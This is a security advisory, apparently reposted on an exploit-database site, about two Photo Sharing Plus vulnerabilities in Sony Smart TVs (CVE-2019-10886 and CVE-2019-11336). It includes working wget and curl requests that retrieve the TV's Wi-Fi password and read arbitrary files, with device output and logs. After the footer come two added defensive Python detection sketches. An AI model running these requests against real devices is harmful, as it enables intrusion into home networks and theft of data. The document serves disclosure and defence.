0day.today - Biggest Exploit Database in the World.
Sony Smart TV Information Disclosure / File Read Vulnerabilities
Risk: Security Risk High
## ADVISORY INFORMATION

TITLE: Multiple vulnerabilities in Sony Smart TVs
ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
DATE PUBLISHED: 23/04/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-10886, CVE-2019-11336
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

## PRODUCT DESCRIPTION

Sony Smart TVs ship with applications that add functionality for customers, including the "Photo Sharing Plus" application. The "Photo Sharing Plus" application running inside the Smart TV contains several weaknesses. This application allows uploading pictures from a smartphone to the TV in order to display them on a large screen. When started, Photo Sharing Plus turns the TV into a Wi-Fi access point and shows a Wi-Fi password, allowing customers to connect and share their media content on the Sony Smart TV.

## DETAILS OF VULNERABILITIES

xen1thLabs found multiple vulnerabilities in Sony products in October 2018 and coordinated the disclosure of these vulnerabilities with Sony.

Two vulnerabilities were found in the Sony Smart TVs by xen1thLabs while auditing the security of Smart TVs. The first vulnerability allows an unauthenticated attacker on the LAN/Wi-Fi to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started. The second vulnerability allows an attacker to read arbitrary files located on the TV, including valuable files, without authentication.
The summary of the vulnerabilities is:

- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016. Recent models are also affected:

- KDL-50W800C
- KDL-50W805C
- KDL-50W807C
- KDL-50W809C
- KDL-50W820C
- KDL-55W800C
- KDL-55W805C
- KDL-65W850C
- KDL-65W855C
- KDL-65W857C
- KDL-75W850C
- KDL-75W855C
- XBR-43X830C
- XBR-49X800C
- XBR-49X830C
- XBR-49X835C
- XBR-49X837C
- XBR-49X839C
- XBR-55X805C
- XBR-55X807C
- XBR-55X809C
- XBR-55X810C
- XBR-55X850C
- XBR-55X855C
- XBR-55X857C
- XBR-65X800C
- XBR-65X805C
- XBR-65X807C
- XBR-65X809C
- XBR-65X810C
- XBR-65X850C
- XBR-65X855C
- XBR-65X857C
- XBR-75X850C
- XBR-75X855C
- XBR-55X900C
- XBR-55X905C
- XBR-55X907C
- XBR-65X900C
- XBR-65X905C
- XBR-65X907C
- XBR-65X930C
- XBR-75X910C
- XBR-75X940C
- XBR-75X945C
- XBR-43X800D
- XBR-49X800D
- XBR-49X835D
- XBR-55X850D
- XBR-55X855D
- XBR-55X857D
- XBR-65X850D
- XBR-65X855D
- XBR-65X857D
- XBR-75X850D
- XBR-75X855D
- XBR-75X857D
- XBR-85X850D
- XBR-85X855D
- XBR-85X857D
- XBR-55X930D
- XBR-65X930D
- XBR-65X935D
- XBR-65X937D
- XBR-75X940D
- XBR-100Z9D
- XBR-49X700D
- XBR-55X700D
- XBR-65X750D
- XBR-65Z9D
- XBR-75Z9D
- XBR-43X800E
- XBR-49X800E
- XBR-49X900E
- XBR-55A1E
- XBR-55X800E
- XBR-55X806E
- XBR-55X900E
- XBR-55X930E
- XBR-65A1E
- XBR-65X850E
- XBR-65X900E
- XBR-65X930E
- XBR-75X850E
- XBR-75X900E
- XBR-75X940E
- XBR-77A1E

### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password through the "Photo Sharing Plus" API.
After starting the application, the following example retrieves the wireless password created by the TV (IP address of the TV is 192.168.1.102) over the LAN, without authentication:

```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

The password is 8362tbwX.

By reading the logs of the TV, we can confirm the password has been delivered over HTTP, without authentication. The logs contain the password in plaintext:

```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

It is also important to note that the wireless password generated by the TV is always the same. Even after a hard reboot and a disconnection from the power supply, the generated password will always be the same. This lack of randomness is also a security issue.

### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

It is possible to retrieve internal TV files over HTTP without authentication.

By default, images used by the Photo Sharing Plus application are stored inside `/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`. The application starts an access point on the television, and an HTTP daemon listens on a TCP port on this WLAN.
Furthermore, this daemon also listens on the LAN side of the television, and it is possible to retrieve these images from the LAN using a URL such as:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing to the address http://[ip_tv]:10000/contentshare/image/ gives access to the root directory of the television, which runs Android.

By exploiting this vulnerability, /default.prop (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:

```
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
* Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none
* Closing connection 0
```

Logs in the TV confirm the /default.prop file has been delivered over HTTP:

```
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
```

## DISCLOSURE TIMELINE

- 03/10/2018 - Vulnerabilities found
- 10/10/2018 - Report to Sony - Report to Sony Bug bounty program through HackerOne
- 12/10/2018 - Confirmation of the reception of the bug report
- 15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C}) - through HackerOne
- 29/10/2018 - Sony confirms the vulnerabilities
- 09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019
- 29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai talk as agreed with Sony
- 14/01/2019 - Updates requested from xen1thLabs
- 15/01/2019 - Sony informs xen1thLabs that they are working on patches
- 27/01/2019 - Updates requested from xen1thLabs
- 07/03/2019 - Updates requested from xen1thLabs
- 15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don't know when they will be ready "maybe in a couple of months"
- 17/03/2019 - Updates requested from Sony to understand and to publish a security advisory. xen1thLabs also requests CVEs officially
- 20/03/2019 - xen1thLabs asks for an acceptable timeline
- 21/03/2019 - xen1thLabs sent an email to Secure@Sony.com due to the lack of proper communication from Sony and informing Sony that in order to protect their customers xen1thLabs needs to publish a security advisory
- 21/03/2019 - Automatic response from Secure@Sony.com is no longer in use.
- 22/03/2019 - Sony is working on the patches and confirms the 12th April
- 26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for CVEs
- 01/04/2019 - Sony confirms the vulnerabilities affect some models and "Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019."
- 16/04/2019 - Sony only provides one CVE instead of two. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"
- 17/04/2019 - xen1thLabs requests a CVE from MITRE
- 23/04/2019 - Public disclosure

## SOLUTION

Apply patches provided by Sony

# 0day.today [2024-12-24] #
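For the arbitrary file read in section 2 (CVE-2019-10886), the missing control is a containment check between the request URI and the image directory. The sketch below is an added example, not code from the advisory or from Sony: `resolve_image_path` and `flag_out_of_root_reads` are hypothetical names, the check assumes the URI is already percent-decoded, and the second sample log line is constructed.

```python
import posixpath
import re

# Directory the advisory names as the application's image store.
IMAGE_ROOT = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"
URI_PREFIX = "/contentshare/image"  # logged by the TV as "loadType"

def resolve_image_path(uri):
    """Map a request URI to a local file path, or None if it leaves IMAGE_ROOT.

    Assumes `uri` is already percent-decoded. The check is lexical only; a
    real handler would also resolve symlinks before opening the file.
    """
    if not uri.startswith(URI_PREFIX + "/"):
        return None
    rest = uri[len(URI_PREFIX):]
    # normpath collapses "..", "." and repeated slashes before the comparison.
    local = posixpath.normpath("/" + rest.lstrip("/"))
    if local == IMAGE_ROOT:
        return None  # the directory itself is not a servable file
    if posixpath.commonpath([local, IMAGE_ROOT]) != IMAGE_ROOT:
        return None
    return local

GET_URI = re.compile(r"PhotoShareApp: \[\d+\]\[e\]Handle get Uri :(\S+)")

def flag_out_of_root_reads(log_text):
    """Return logged request URIs that resolve outside IMAGE_ROOT."""
    return [m.group(1) for m in GET_URI.finditer(log_text)
            if resolve_image_path(m.group(1)) is None]

# First line is taken from the advisory's log; the second is constructed.
SAMPLE_LOG = "\n".join([
    "01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :"
    "/contentshare/image/default.prop",
    "01-01 07:46:05.120 5539 18776 I PhotoShareApp: [18776][e]Handle get Uri :"
    "/contentshare/image" + IMAGE_ROOT + "/LJYT0010.JPG",
])

if __name__ == "__main__":
    for uri in flag_out_of_root_reads(SAMPLE_LOG):
        print("read outside image directory:", uri)
```

Run over a captured logcat, the same function doubles as a detection for past out-of-directory reads through the Photo Sharing Plus daemon.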
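For the information disclosure in section 1 (CVE-2019-11336), TV logs collected across several application starts show both whether the Wi-Fi key was sent in an API response and whether it ever changes. This is an added example, not part of the advisory: the function names are hypothetical, the first log line is the one quoted in the advisory, and the second session is constructed by changing its timestamp.

```python
import hashlib
import json
import re

SEND = re.compile(r"HttpEndPoint: send: (\{.*\})\s*$")

def fingerprint(key):
    """Short hash so keys can be compared without copying them into reports."""
    return hashlib.sha256(key.encode()).hexdigest()[:12]

def disclosed_keys(log_text):
    """Return (ssid, key fingerprint) for each logged response carrying a key."""
    found = []
    for line in log_text.splitlines():
        m = SEND.search(line)
        if not m:
            continue
        try:
            body = json.loads(m.group(1))
        except json.JSONDecodeError:
            continue  # truncated or non-JSON payload in the log
        results = body.get("result")
        if not isinstance(results, list):
            continue
        for entry in results:
            if isinstance(entry, dict) and entry.get("key"):
                found.append((entry.get("ssid", ""), fingerprint(entry["key"])))
    return found

def static_key_ssids(sessions):
    """Given one log per application start, return SSIDs whose key never changed."""
    seen = {}
    for log_text in sessions:
        for ssid, fp in disclosed_keys(log_text):
            seen.setdefault(ssid, []).append(fp)
    return sorted(s for s, fps in seen.items()
                  if len(fps) > 1 and len(set(fps)) == 1)

# Log line quoted in the advisory.
ADVISORY_LINE = (
    r'01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: '
    r'{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX",'
    r'"deviceName":"","url":"http:\/\/192.168.49.1",'
    r'"touchPadRemote":"notSupported"}],"id":80}'
)
# Constructed second session: same response logged after a later restart.
SESSIONS = [ADVISORY_LINE, ADVISORY_LINE.replace("07:47:23.730", "09:12:40.118")]

if __name__ == "__main__":
    print("static key on:", static_key_ssids(SESSIONS))
```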